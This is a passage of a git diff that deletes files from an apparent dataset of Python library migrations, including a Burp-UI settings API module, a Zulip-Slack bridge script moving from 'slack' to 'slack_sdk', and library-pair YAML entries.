conf=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_cli(client, conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_cli', server), - string=api.bui.cli.get_parser_attr('string_cli', server), - integer=api.bui.cli.get_parser_attr('integer_cli', server), - multi=api.bui.cli.get_parser_attr('multi_cli', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/new-client', - '/api//settings/new-client', - endpoint='api.new_client') -class NewClient(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('newclient', type=str) - - @login_required - def put(self, server=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - return {'notif': [[2, 'Sorry, you don\'t have rights to access the setting panel']]}, 403 - - newclient = self.parser.parse_args()['newclient'] - if not newclient: - return {'notif': [[2, 'No client name provided']]}, 400 - # clientconfdir = api.bui.cli.get_parser_attr('clientconfdir', server) - # if not clientconfdir: - # flash('Could not proceed, no \'clientconfdir\' find', 'warning') - # return redirect(request.referrer) - noti = api.bui.cli.store_conf_cli(ImmutableMultiDict(), newclient, None, server) - if server: - noti.append([3, '
Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', server=server, client=newclient), newclient)]) - else: - noti.append([3, 'Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', client=newclient), newclient)]) - return {'notif': noti}, 201 - - -@api.resource('/api/settings/path-expander', - '/api//settings/path-expander', - '/api/settings/path-expander/', - '/api//settings/path-expander/', - endpoint='api.path_expander') -class PathExpander(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('path') - - @login_required - def get(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - path = self.parser.parse_args()['path'] - paths = api.bui.cli.expand_path(path, client, server) - if not paths: - noti = [[2, "Path not found"]] - return {'notif': noti}, 500 - return {'result': paths} - - -@api.resource('/api/settings/delete-client', - '/api//settings/delete-client', - '/api/settings/delete-client/', - '/api//settings/delete-client/', - endpoint='api.delete_client') -class DeleteClient(Resource): - - @login_required - def delete(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - return {'notif': api.bui.cli.delete_client(client, server)}, 200 diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py deleted file mode 100644 index 14d1cfb..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$settings.py.target.py +++ /dev/null @@ -1,311 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.settings - :platform: Unix - :synopsis: Burp-UI settings api module. - -.. moduleauthor:: Ziirish - -""" -import sys - -# This is a submodule we can also use "from ..api import api" -from . import api -from flask.ext.restplus import reqparse, abort, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify, request, url_for -from werkzeug.datastructures import ImmutableMultiDict -if sys.version_info >= (3, 0): - from urllib.parse import unquote -else: - from urllib import unquote - - -@api.resource('/api/settings/server-config', - '/api//settings/server-config', - '/api/settings/server-config/', - '/api//settings/server-config/', - endpoint='api.server_settings') -class ServerSettings(Resource): - """The :class:`burpui.api.settings.ServerSettings` resource allows you to - read and write the server's configuration. - - This resource is part of the :mod:`burpui.api.settings` module. - """ - - @login_required - def post(self, conf=None, server=None): - noti = api.bui.cli.store_conf_srv(request.form, conf, server) - return {'notif': noti}, 200 - - @login_required - def get(self, conf=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "boolean": [ - "daemon", - "fork", - "..." - ], - "defaults": { - "address": "", - "autoupgrade_dir": "", - "ca_burp_ca": "", - "ca_conf": "", - "ca_name": "", - "ca_server_name": "", - "client_can_delete": true, - "...": "..." 
- }, - "integer": [ - "port", - "status_port", - "..." - ], - "multi": [ - "keep", - "restore_client", - "..." - ], - "placeholders": { - "autoupgrade_dir": "path", - "ca_burp_ca": "path", - "ca_conf": "path", - "ca_name": "name", - "ca_server_name": "name", - "client_can_delete": "0|1", - "...": "..." - }, - "results": { - "boolean": [ - { - "name": "hardlinked_archive", - "value": false - }, - { - "name": "syslog", - "value": true - }, - { "...": "..." } - ], - "clients": [ - { - "name": "testclient", - "value": "/etc/burp/clientconfdir/testclient" - } - ], - "common": [ - { - "name": "mode", - "value": "server" - }, - { - "name": "directory", - "value": "/var/spool/burp" - }, - { "...": "..." } - ], - "includes": [], - "includes_ext": [], - "integer": [ - { - "name": "port", - "value": 4971 - }, - { - "name": "status_port", - "value": 4972 - }, - { "...": "..." } - ], - "multi": [ - { - "name": "keep", - "value": [ - "7", - "4" - ] - }, - { "...": "..." } - ] - }, - "server_doc": { - "address": "Defines the main TCP address that the server listens on. The default is either '::' or '0.0.0.0', dependent upon compile time options.", - "...": "..." - }, - "string": [ - "mode", - "address", - "..." - ], - "suggest": { - "compression": [ - "gzip1", - "gzip2", - "gzip3", - "gzip4", - "gzip5", - "gzip6", - "gzip7", - "gzip8", - "gzip9" - ], - "mode": [ - "client", - "server" - ], - "...": [] - } - } - - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. - """ - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_srv(conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_srv', server), - string=api.bui.cli.get_parser_attr('string_srv', server), - integer=api.bui.cli.get_parser_attr('integer_srv', server), - multi=api.bui.cli.get_parser_attr('multi_srv', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/clients.json', - '/api//settings/clients.json', - endpoint='api.clients_list') -class ClientsList(Resource): - - @login_required - def get(self, server=None): - res = api.bui.cli.clients_list(server) - return jsonify(result=res) - - -@api.resource('/api/settings//client-config', - '/api/settings//client-config/', - '/api//settings//client-config', - '/api//settings//client-config/', - endpoint='api.client_settings') -class ClientSettings(Resource): - - @login_required - def post(self, server=None, client=None, conf=None): - noti = api.bui.cli.store_conf_cli(request.form, client, conf, server) - return jsonify(notif=noti) - - @login_required - def get(self, server=None, client=None, conf=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - abort(403, message='Sorry, you don\'t have rights to access the setting panel') - - try: - conf = unquote(conf) - except: - pass - r = api.bui.cli.read_conf_cli(client, conf, server) - return jsonify(results=r, - boolean=api.bui.cli.get_parser_attr('boolean_cli', server), - 
string=api.bui.cli.get_parser_attr('string_cli', server), - integer=api.bui.cli.get_parser_attr('integer_cli', server), - multi=api.bui.cli.get_parser_attr('multi_cli', server), - server_doc=api.bui.cli.get_parser_attr('doc', server), - suggest=api.bui.cli.get_parser_attr('values', server), - placeholders=api.bui.cli.get_parser_attr('placeholders', server), - defaults=api.bui.cli.get_parser_attr('defaults', server)) - - -@api.resource('/api/settings/new-client', - '/api//settings/new-client', - endpoint='api.new_client') -class NewClient(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('newclient', type=str) - - @login_required - def put(self, server=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - return {'notif': [[2, 'Sorry, you don\'t have rights to access the setting panel']]}, 403 - - newclient = self.parser.parse_args()['newclient'] - if not newclient: - return {'notif': [[2, 'No client name provided']]}, 400 - # clientconfdir = api.bui.cli.get_parser_attr('clientconfdir', server) - # if not clientconfdir: - # flash('Could not proceed, no \'clientconfdir\' find', 'warning') - # return redirect(request.referrer) - noti = api.bui.cli.store_conf_cli(ImmutableMultiDict(), newclient, None, server) - if server: - noti.append([3, 'Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', server=server, client=newclient), newclient)]) - else: - noti.append([3, 'Click here to edit \'{}\' configuration'.format(url_for('view.cli_settings', client=newclient), newclient)]) - return {'notif': noti}, 201 - - -@api.resource('/api/settings/path-expander', - '/api//settings/path-expander', - '/api/settings/path-expander/', - '/api//settings/path-expander/', - endpoint='api.path_expander') -class PathExpander(Resource): - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('path') - - @login_required - def get(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - path = self.parser.parse_args()['path'] - paths = api.bui.cli.expand_path(path, client, server) - if not paths: - noti = [[2, "Path not found"]] - return {'notif': noti}, 500 - return {'result': paths} - - -@api.resource('/api/settings/delete-client', - '/api//settings/delete-client', - '/api/settings/delete-client/', - '/api//settings/delete-client/', - endpoint='api.delete_client') -class DeleteClient(Resource): - - @login_required - def delete(self, server=None, client=None): - # Only the admin can edit the configuration - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - noti = [[2, 'Sorry, you don\'t have rights to access the setting panel']] - return {'notif': noti}, 403 - - return {'notif': api.bui.cli.delete_client(client, server)}, 200 diff --git a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff b/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff deleted file mode 100644 index 2b16446..0000000 --- a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.diff +++ /dev/null @@ -1,36 +0,0 @@ -diff --git 
a/zulip/integrations/bridge_with_slack/run-slack-bridge b/zulip/integrations/bridge_with_slack/run-slack-bridge - index 470967cfdb6b83433fa3e3ce69e22a793f96c428..2d9cf64db860ab5e5eabb8151254b0f3dab609bd 100644 - --- a/zulip/integrations/bridge_with_slack/run-slack-bridge - +++ b/zulip/integrations/bridge_with_slack/run-slack-bridge -@@ -7,7 +7,8 @@ import argparse - import traceback - import multiprocessing as mp - import zulip --import slack -+import slack_sdk -+from slack_sdk.rtm import RTMClient - from typing import Any, Dict, Callable - - import bridge_with_slack_config -@@ -44,10 +45,10 @@ class SlackBridge: - - # slack-specific - self.channel = self.slack_config["channel"] -- self.slack_client = slack.RTMClient(token=self.slack_config["token"], auto_reconnect=True) -+ self.slack_client = RTMClient(token=self.slack_config["token"], auto_reconnect=True) - # Spawn a non-websocket client for getting the users - # list and for posting messages in Slack. -- self.slack_webclient = slack.WebClient(token=self.slack_config["token"]) -+ self.slack_webclient = slack_sdk.WebClient(token=self.slack_config["token"]) - - def wrap_slack_mention_with_bracket(self, zulip_msg: Dict[str, Any]) -> None: - words = zulip_msg["content"].split(' ') -@@ -81,7 +82,7 @@ class SlackBridge: - self.slack_id_to_name = {u["id"]: u["profile"].get("display_name", u["profile"]["real_name"]) for u in members} - self.slack_name_to_id = {v: k for k, v in self.slack_id_to_name.items()} - -- @slack.RTMClient.run_on(event='message') -+ @RTMClient.run_on(event='message') - def slack_to_zulip(**payload: Any) -> None: - msg = payload['data'] - if msg['channel'] != self.channel: diff --git a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py b/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py deleted file mode 100644 index 40ef5fc..0000000 --- a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.source.py +++ /dev/null @@ -1,136 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -import sys -import os -import argparse -import traceback -import multiprocessing as mp -import zulip -import slack -from typing import Any, Dict, Callable - -import bridge_with_slack_config - -# change these templates to change the format of displayed message -ZULIP_MESSAGE_TEMPLATE = "**{username}**: {message}" -SLACK_MESSAGE_TEMPLATE = "<{username}> {message}" - -def check_zulip_message_validity(msg: Dict[str, Any], config: Dict[str, Any]) -> bool: - is_a_stream = msg["type"] == "stream" - in_the_specified_stream = msg["display_recipient"] == config["stream"] - at_the_specified_subject = msg["subject"] == config["topic"] - - # We do this to identify the messages generated from Matrix -> Zulip - # and we make sure we don't forward it again to the Matrix. 
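The .diff above captures the second migration recorded in this patch's data: the deprecated `slack` package (slackclient v2) replaced by `slack_sdk`, a top-level rename plus one deeper import for the legacy RTM client. A sketch of just the renamed entry points (the token is a placeholder; the RTM API needs a token with classic RTM access):

import slack_sdk
from slack_sdk.rtm import RTMClient

web = slack_sdk.WebClient(token='xoxb-placeholder')             # was: slack.WebClient
rtm = RTMClient(token='xoxb-placeholder', auto_reconnect=True)  # was: slack.RTMClient

@RTMClient.run_on(event='message')  # the class-level decorator moved with the class
def on_message(**payload):
    print(payload['data'].get('text', ''))

# rtm.start() opens the websocket loop, exactly as sb.slack_client.start() does below.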
- not_from_zulip_bot = msg["sender_email"] != config["email"] - if is_a_stream and not_from_zulip_bot and in_the_specified_stream and at_the_specified_subject: - return True - return False - -class SlackBridge: - def __init__(self, config: Dict[str, Any]) -> None: - self.config = config - self.zulip_config = config["zulip"] - self.slack_config = config["slack"] - - # zulip-specific - self.zulip_client = zulip.Client( - email=self.zulip_config["email"], - api_key=self.zulip_config["api_key"], - site=self.zulip_config["site"]) - self.zulip_stream = self.zulip_config["stream"] - self.zulip_subject = self.zulip_config["topic"] - - # slack-specific - self.channel = self.slack_config["channel"] - self.slack_client = slack.RTMClient(token=self.slack_config["token"], auto_reconnect=True) - # Spawn a non-websocket client for getting the users - # list and for posting messages in Slack. - self.slack_webclient = slack.WebClient(token=self.slack_config["token"]) - - def wrap_slack_mention_with_bracket(self, zulip_msg: Dict[str, Any]) -> None: - words = zulip_msg["content"].split(' ') - for w in words: - if w.startswith('@'): - zulip_msg["content"] = zulip_msg["content"].replace(w, '<' + w + '>') - - def replace_slack_id_with_name(self, msg: Dict[str, Any]) -> None: - words = msg['text'].split(' ') - for w in words: - if w.startswith('<@') and w.endswith('>'): - _id = w[2:-1] - msg['text'] = msg['text'].replace(_id, self.slack_id_to_name[_id]) - - def zulip_to_slack(self) -> Callable[[Dict[str, Any]], None]: - def _zulip_to_slack(msg: Dict[str, Any]) -> None: - message_valid = check_zulip_message_validity(msg, self.zulip_config) - if message_valid: - self.wrap_slack_mention_with_bracket(msg) - slack_text = SLACK_MESSAGE_TEMPLATE.format(username=msg["sender_full_name"], - message=msg["content"]) - self.slack_webclient.chat_postMessage( - channel=self.channel, - text=slack_text, - ) - return _zulip_to_slack - - def run_slack_listener(self) -> None: - members = self.slack_webclient.users_list()['members'] - # See also https://api.slack.com/changelog/2017-09-the-one-about-usernames - self.slack_id_to_name = {u["id"]: u["profile"].get("display_name", u["profile"]["real_name"]) for u in members} - self.slack_name_to_id = {v: k for k, v in self.slack_id_to_name.items()} - - @slack.RTMClient.run_on(event='message') - def slack_to_zulip(**payload: Any) -> None: - msg = payload['data'] - if msg['channel'] != self.channel: - return - user_id = msg['user'] - user = self.slack_id_to_name[user_id] - from_bot = user == self.slack_config['username'] - if from_bot: - return - self.replace_slack_id_with_name(msg) - content = ZULIP_MESSAGE_TEMPLATE.format(username=user, message=msg['text']) - msg_data = dict( - type="stream", - to=self.zulip_stream, - subject=self.zulip_subject, - content=content) - self.zulip_client.send_message(msg_data) - - self.slack_client.start() - -if __name__ == "__main__": - usage = """run-slack-bridge - - Relay each message received at a specified subject in a specified stream from - the first realm to a channel in a Slack workspace. 
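The two rewrite helpers above are plain token surgery: Zulip to Slack wraps `@user` mentions in angle brackets so Slack linkifies them, and Slack to Zulip maps raw user IDs back to display names. Distilled to a standalone demo (the ID table is made up):

slack_id_to_name = {'U123': 'ziirish'}

def wrap_mentions(content: str) -> str:
    # '@U123' -> '<@U123>'; everything else passes through untouched
    return ' '.join('<' + w + '>' if w.startswith('@') else w
                    for w in content.split(' '))

def replace_ids(text: str) -> str:
    # '<@U123>' -> '<@ziirish>'
    for w in text.split(' '):
        if w.startswith('<@') and w.endswith('>'):
            text = text.replace(w[2:-1], slack_id_to_name[w[2:-1]])
    return text

print(wrap_mentions('ping @U123'))   # ping <@U123>
print(replace_ids('<@U123> hello'))  # <@ziirish> hello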
- """ - - sys.path.append(os.path.join(os.path.dirname(__file__), '..')) - parser = argparse.ArgumentParser(usage=usage) - - print("Starting slack mirroring bot") - print("MAKE SURE THE BOT IS SUBSCRIBED TO THE RELEVANT ZULIP STREAM") - - config = bridge_with_slack_config.config - - backoff = zulip.RandomExponentialBackoff(timeout_success_equivalent=300) - while backoff.keep_going(): - try: - sb = SlackBridge(config) - - zp = mp.Process(target=sb.zulip_client.call_on_each_message, args=(sb.zulip_to_slack(),)) - sp = mp.Process(target=sb.run_slack_listener, args=()) - print("Starting message handler on Zulip client") - zp.start() - print("Starting message handler on Slack client") - sp.start() - - zp.join() - sp.join() - except Exception: - traceback.print_exc() - backoff.fail() diff --git a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py b/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py deleted file mode 100644 index 70b57d4..0000000 --- a/v1/data/codefile/zulip@python-zulip-api__2d9cf64__zulip$integrations$bridge_with_slack$run-slack-bridge.target.py +++ /dev/null @@ -1,137 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -import sys -import os -import argparse -import traceback -import multiprocessing as mp -import zulip -import slack_sdk -from slack_sdk.rtm import RTMClient -from typing import Any, Dict, Callable - -import bridge_with_slack_config - -# change these templates to change the format of displayed message -ZULIP_MESSAGE_TEMPLATE = "**{username}**: {message}" -SLACK_MESSAGE_TEMPLATE = "<{username}> {message}" - -def check_zulip_message_validity(msg: Dict[str, Any], config: Dict[str, Any]) -> bool: - is_a_stream = msg["type"] == "stream" - in_the_specified_stream = msg["display_recipient"] == config["stream"] - at_the_specified_subject = msg["subject"] == config["topic"] - - # We do this to identify the messages generated from Matrix -> Zulip - # and we make sure we don't forward it again to the Matrix. - not_from_zulip_bot = msg["sender_email"] != config["email"] - if is_a_stream and not_from_zulip_bot and in_the_specified_stream and at_the_specified_subject: - return True - return False - -class SlackBridge: - def __init__(self, config: Dict[str, Any]) -> None: - self.config = config - self.zulip_config = config["zulip"] - self.slack_config = config["slack"] - - # zulip-specific - self.zulip_client = zulip.Client( - email=self.zulip_config["email"], - api_key=self.zulip_config["api_key"], - site=self.zulip_config["site"]) - self.zulip_stream = self.zulip_config["stream"] - self.zulip_subject = self.zulip_config["topic"] - - # slack-specific - self.channel = self.slack_config["channel"] - self.slack_client = RTMClient(token=self.slack_config["token"], auto_reconnect=True) - # Spawn a non-websocket client for getting the users - # list and for posting messages in Slack. 
- self.slack_webclient = slack_sdk.WebClient(token=self.slack_config["token"]) - - def wrap_slack_mention_with_bracket(self, zulip_msg: Dict[str, Any]) -> None: - words = zulip_msg["content"].split(' ') - for w in words: - if w.startswith('@'): - zulip_msg["content"] = zulip_msg["content"].replace(w, '<' + w + '>') - - def replace_slack_id_with_name(self, msg: Dict[str, Any]) -> None: - words = msg['text'].split(' ') - for w in words: - if w.startswith('<@') and w.endswith('>'): - _id = w[2:-1] - msg['text'] = msg['text'].replace(_id, self.slack_id_to_name[_id]) - - def zulip_to_slack(self) -> Callable[[Dict[str, Any]], None]: - def _zulip_to_slack(msg: Dict[str, Any]) -> None: - message_valid = check_zulip_message_validity(msg, self.zulip_config) - if message_valid: - self.wrap_slack_mention_with_bracket(msg) - slack_text = SLACK_MESSAGE_TEMPLATE.format(username=msg["sender_full_name"], - message=msg["content"]) - self.slack_webclient.chat_postMessage( - channel=self.channel, - text=slack_text, - ) - return _zulip_to_slack - - def run_slack_listener(self) -> None: - members = self.slack_webclient.users_list()['members'] - # See also https://api.slack.com/changelog/2017-09-the-one-about-usernames - self.slack_id_to_name = {u["id"]: u["profile"].get("display_name", u["profile"]["real_name"]) for u in members} - self.slack_name_to_id = {v: k for k, v in self.slack_id_to_name.items()} - - @RTMClient.run_on(event='message') - def slack_to_zulip(**payload: Any) -> None: - msg = payload['data'] - if msg['channel'] != self.channel: - return - user_id = msg['user'] - user = self.slack_id_to_name[user_id] - from_bot = user == self.slack_config['username'] - if from_bot: - return - self.replace_slack_id_with_name(msg) - content = ZULIP_MESSAGE_TEMPLATE.format(username=user, message=msg['text']) - msg_data = dict( - type="stream", - to=self.zulip_stream, - subject=self.zulip_subject, - content=content) - self.zulip_client.send_message(msg_data) - - self.slack_client.start() - -if __name__ == "__main__": - usage = """run-slack-bridge - - Relay each message received at a specified subject in a specified stream from - the first realm to a channel in a Slack workspace. 
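The `__main__` block below (unchanged between source and target) wires a small supervisor: one process per bridge direction, restarted under `zulip.RandomExponentialBackoff` when setup fails. The shape, reduced to its bones (the worker bodies are stand-ins; `keep_going()` and `fail()` are the real backoff API):

import multiprocessing as mp
import time
import traceback
import zulip

def run_zulip_side() -> None:
    time.sleep(1)  # stand-in for zulip_client.call_on_each_message(...)

def run_slack_side() -> None:
    time.sleep(1)  # stand-in for SlackBridge.run_slack_listener()

def main() -> None:
    backoff = zulip.RandomExponentialBackoff(timeout_success_equivalent=300)
    while backoff.keep_going():
        try:
            zp = mp.Process(target=run_zulip_side)
            sp = mp.Process(target=run_slack_side)
            zp.start()
            sp.start()
            zp.join()
            sp.join()
        except Exception:
            traceback.print_exc()
            backoff.fail()  # records the failure and sleeps a jittered exponential delay

if __name__ == '__main__':
    main()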
- """ - - sys.path.append(os.path.join(os.path.dirname(__file__), '..')) - parser = argparse.ArgumentParser(usage=usage) - - print("Starting slack mirroring bot") - print("MAKE SURE THE BOT IS SUBSCRIBED TO THE RELEVANT ZULIP STREAM") - - config = bridge_with_slack_config.config - - backoff = zulip.RandomExponentialBackoff(timeout_success_equivalent=300) - while backoff.keep_going(): - try: - sb = SlackBridge(config) - - zp = mp.Process(target=sb.zulip_client.call_on_each_message, args=(sb.zulip_to_slack(),)) - sp = mp.Process(target=sb.run_slack_listener, args=()) - print("Starting message handler on Zulip client") - zp.start() - print("Starting message handler on Slack client") - sp.start() - - zp.join() - sp.join() - except Exception: - traceback.print_exc() - backoff.fail() diff --git a/v1/data/libpair/appdirs,platformdirs.yaml b/v1/data/libpair/appdirs,platformdirs.yaml deleted file mode 100644 index 769371c..0000000 --- a/v1/data/libpair/appdirs,platformdirs.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: appdirs,platformdirs -source: appdirs -target: platformdirs -domain: Utilities diff --git a/v1/data/libpair/argparse,configargparse.yaml b/v1/data/libpair/argparse,configargparse.yaml deleted file mode 100644 index 827e1ff..0000000 --- a/v1/data/libpair/argparse,configargparse.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: argparse,configargparse -source: argparse -target: configargparse -domain: Utilities diff --git a/v1/data/libpair/attr,attrs.yaml b/v1/data/libpair/attr,attrs.yaml deleted file mode 100644 index 08a5ed9..0000000 --- a/v1/data/libpair/attr,attrs.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: attr,attrs -source: attr -target: attrs -domain: Utilities diff --git a/v1/data/libpair/celery,rq.yaml b/v1/data/libpair/celery,rq.yaml deleted file mode 100644 index 79f2405..0000000 --- a/v1/data/libpair/celery,rq.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: celery,rq -source: celery -target: rq -domain: Multitasking/multiprocessing diff --git a/v1/data/libpair/cheetah,cheetah3.yaml b/v1/data/libpair/cheetah,cheetah3.yaml deleted file mode 100644 index 62533a1..0000000 --- a/v1/data/libpair/cheetah,cheetah3.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: cheetah,cheetah3 -source: cheetah -target: cheetah3 -domain: Utilities diff --git a/v1/data/libpair/dataproperty,typepy.yaml b/v1/data/libpair/dataproperty,typepy.yaml deleted file mode 100644 index 8e223cf..0000000 --- a/v1/data/libpair/dataproperty,typepy.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: dataproperty,typepy -source: dataproperty -target: typepy -domain: Utilities diff --git a/v1/data/libpair/django-registration,django-registration-redux.yaml b/v1/data/libpair/django-registration,django-registration-redux.yaml deleted file mode 100644 index 6516a96..0000000 --- a/v1/data/libpair/django-registration,django-registration-redux.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: django-registration,django-registration-redux -source: django-registration -target: django-registration-redux -domain: Development framework/extension diff --git a/v1/data/libpair/django-rest-swagger,drf-yasg.yaml b/v1/data/libpair/django-rest-swagger,drf-yasg.yaml deleted file mode 100644 index a3d30a0..0000000 --- a/v1/data/libpair/django-rest-swagger,drf-yasg.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: django-rest-swagger,drf-yasg -source: django-rest-swagger -target: drf-yasg -domain: Utilities diff --git a/v1/data/libpair/dotenv,python-dotenv.yaml b/v1/data/libpair/dotenv,python-dotenv.yaml deleted file mode 100644 index 36095d6..0000000 --- a/v1/data/libpair/dotenv,python-dotenv.yaml +++ 
/dev/null @@ -1,4 +0,0 @@ -id: dotenv,python-dotenv -source: dotenv -target: python-dotenv -domain: File reader/writer diff --git a/v1/data/libpair/eventlet,gevent.yaml b/v1/data/libpair/eventlet,gevent.yaml deleted file mode 100644 index 7852f8f..0000000 --- a/v1/data/libpair/eventlet,gevent.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: eventlet,gevent -source: eventlet -target: gevent -domain: Networking diff --git a/v1/data/libpair/flask,fastapi.yaml b/v1/data/libpair/flask,fastapi.yaml deleted file mode 100644 index 762d578..0000000 --- a/v1/data/libpair/flask,fastapi.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask,fastapi -source: flask -target: fastapi -domain: Development framework/extension diff --git a/v1/data/libpair/flask,quart.yaml b/v1/data/libpair/flask,quart.yaml deleted file mode 100644 index 3fe35a2..0000000 --- a/v1/data/libpair/flask,quart.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask,quart -source: flask -target: quart -domain: Development framework/extension diff --git a/v1/data/libpair/flask,uvicorn.yaml b/v1/data/libpair/flask,uvicorn.yaml deleted file mode 100644 index 6406309..0000000 --- a/v1/data/libpair/flask,uvicorn.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask,uvicorn -source: flask -target: uvicorn -domain: HTTP client/server diff --git a/v1/data/libpair/flask-restful,flask-restplus.yaml b/v1/data/libpair/flask-restful,flask-restplus.yaml deleted file mode 100644 index 079e15c..0000000 --- a/v1/data/libpair/flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -domain: Development framework/extension diff --git a/v1/data/libpair/flask-restplus,flask-restx.yaml b/v1/data/libpair/flask-restplus,flask-restx.yaml deleted file mode 100644 index 9c91938..0000000 --- a/v1/data/libpair/flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -domain: Development framework/extension diff --git a/v1/data/libpair/flask-security,flask-security-too.yaml b/v1/data/libpair/flask-security,flask-security-too.yaml deleted file mode 100644 index 2eb3ba4..0000000 --- a/v1/data/libpair/flask-security,flask-security-too.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: flask-security,flask-security-too -source: flask-security -target: flask-security-too -domain: Development framework/extension diff --git a/v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml b/v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml deleted file mode 100644 index 540ee48..0000000 --- a/v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: fuzzywuzzy,rapidfuzz -source: fuzzywuzzy -target: rapidfuzz -domain: Utilities diff --git a/v1/data/libpair/gcloud-aio-core,aiohttp.yaml b/v1/data/libpair/gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index f476d4f..0000000 --- a/v1/data/libpair/gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -domain: HTTP client/server diff --git a/v1/data/libpair/gevent,eventlet.yaml b/v1/data/libpair/gevent,eventlet.yaml deleted file mode 100644 index 418e8cd..0000000 --- a/v1/data/libpair/gevent,eventlet.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: gevent,eventlet -source: gevent -target: eventlet -domain: Networking diff --git a/v1/data/libpair/gunicorn,waitress.yaml b/v1/data/libpair/gunicorn,waitress.yaml deleted file mode 100644 index b900fc3..0000000 --- a/v1/data/libpair/gunicorn,waitress.yaml +++ /dev/null @@ -1,4 +0,0 @@ -id: 
